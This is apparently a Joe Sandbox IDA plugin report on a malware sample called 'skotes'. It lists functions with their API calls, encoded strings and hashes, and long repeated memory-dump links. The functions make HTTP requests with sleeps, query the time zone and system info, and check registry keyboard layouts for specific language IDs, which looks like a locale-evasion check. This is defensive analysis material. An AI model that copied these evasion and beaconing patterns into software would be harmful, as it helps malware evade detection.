Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 565725191-239921721
Opcode ID: d0e297c3abd2df61697afb01af7079f31fad7064d70d3f146a6de6d9dd226d89
Instruction ID: 20ed00e8c6bb6f380797e3dd7624f11ce6ec664d74a8b71ea1c59f9b7b4e0d09
Opcode Fuzzy Hash: d0e297c3abd2df61697afb01af7079f31fad7064d70d3f146a6de6d9dd226d89
Instruction Fuzzy Hash: 24C13676A00265BBDB249F78EC41BEE7BB8EF46314F1440A9F890D7691E7308E41E750

Function 00BEBE30 Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 313
networksleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000005DC,C90F3C56,?,00000000), ref: 00BEBEB8
InternetOpenW.WININET(00C38DC8,00000000,00000000,00000000,00000000), ref: 00BEBEC7
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00BEBEEC
HttpOpenRequestA.WININET(?,00000000), ref: 00BEBF36
HttpSendRequestA.WININET(?,00000000), ref: 00BEBFF6
InternetReadFile.WININET(?,?,000003FF,?), ref: 00BEC0A8
InternetCloseHandle.WININET(?), ref: 00BEC187
InternetCloseHandle.WININET(?), ref: 00BEC18F
InternetCloseHandle.WININET(?), ref: 00BEC197

Strings

stoi argument out of range, xrefs: 00BEE4EA
invalid stoi argument, xrefs: 00BEE4F4
8HJUeIfzLo==, xrefs: 00BEC3CB, 00BEC623
RE1NXF==, xrefs: 00BEBF0E
8HJUeMD Lq5=, xrefs: 00BEC465

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
API String ID: 2167506142-885246636
Opcode ID: 57f01bfd4e4d5a7596a02a116bbb4b1d8f0f93bc291139b0d2b1a7366fb89500
Instruction ID: 74576e4025605bf3624c6562f49cdf6b8681e7e27b77de761d85f9f32b7e234a
Opcode Fuzzy Hash: 57f01bfd4e4d5a7596a02a116bbb4b1d8f0f93bc291139b0d2b1a7366fb89500
Instruction Fuzzy Hash: 5EB105B1600258ABDB28DF29CC85BEEBBB5EF45304F5041E9F508972C2DB709AC5CB95

Function 00BE6020 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 275
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 00BE617D
RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00BE6271

Strings

00000423, xrefs: 00BE60FA
00000422, xrefs: 00BE60C9
00000419, xrefs: 00BE6098
0000043f, xrefs: 00BE612B
Keyboard Layout\Preload, xrefs: 00BE6054

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: EnumOpenValue
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 2571532894-3963862150
Opcode ID: aa579711ae04163ad354b169290b4a110dd5d362d82e2c099fb818f58b3efd4a
Instruction ID: c6717d9ca85fd3b4e3cd66321d42abed006be451720f2baf1327e4f7573782e8
Opcode Fuzzy Hash: aa579711ae04163ad354b169290b4a110dd5d362d82e2c099fb818f58b3efd4a
Instruction Fuzzy Hash: 3DB1BF7190026C9BDB24DB24CC89BEEB7B9AF15340F4402D9E108E72D1DB74AFA88F54

Function 00BE7D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BE7ED3

Strings

JjssPV==, xrefs: 00BE81E2
JjsrQV==, xrefs: 00BE8092
JjssOl==, xrefs: 00BE813A
JjsrPl==, xrefs: 00BE828A

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
API String ID: 1721193555-3123340372
Opcode ID: 041f59cbfc4406dac10b36b9a86e9f82f61c38fca4d822f340f22a413acf2413
Instruction ID: 6fea353e328cfe1efe2f71d6cf97cd15b8f5d4a91666c5b980afbfdf458666b8
Opcode Fuzzy Hash: 041f59cbfc4406dac10b36b9a86e9f82f61c38fca4d822f340f22a413acf2413
Instruction Fuzzy Hash: 67E11770E00684ABCB24BB29CD5B7AD7BB1EB42714F9442D8E4196B3C2DF354E9587C2

Function 00C226F2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00C36758), ref: 00C2275C

Strings

Eastern Summer Time, xrefs: 00C227FA
Eastern Standard Time, xrefs: 00C227CB

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 565725191-239921721
Opcode ID: 58d91f773b72f406ae069621eb64c970843bbea5289642f819f52b129b341a32
Instruction ID: 09ed2f8bba24ae54ef745da20b69706d6d61dd1070d92d487cc7b5ccc86ad32c
Opcode Fuzzy Hash: 58d91f773b72f406ae069621eb64c970843bbea5289642f819f52b129b341a32
Instruction Fuzzy Hash: A3510972900225BBDB20EF69EC41AAE77B8FF46310F104269E520E75E5E7709E419B51

Function 00C16FB4 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00C16EE6), ref: 00C16FD6
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00C17030
__dosmaperr.LIBCMT ref: 00C170C5

Part of subcall function 00C1732A: __dosmaperr.LIBCMT ref: 00C1735F

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
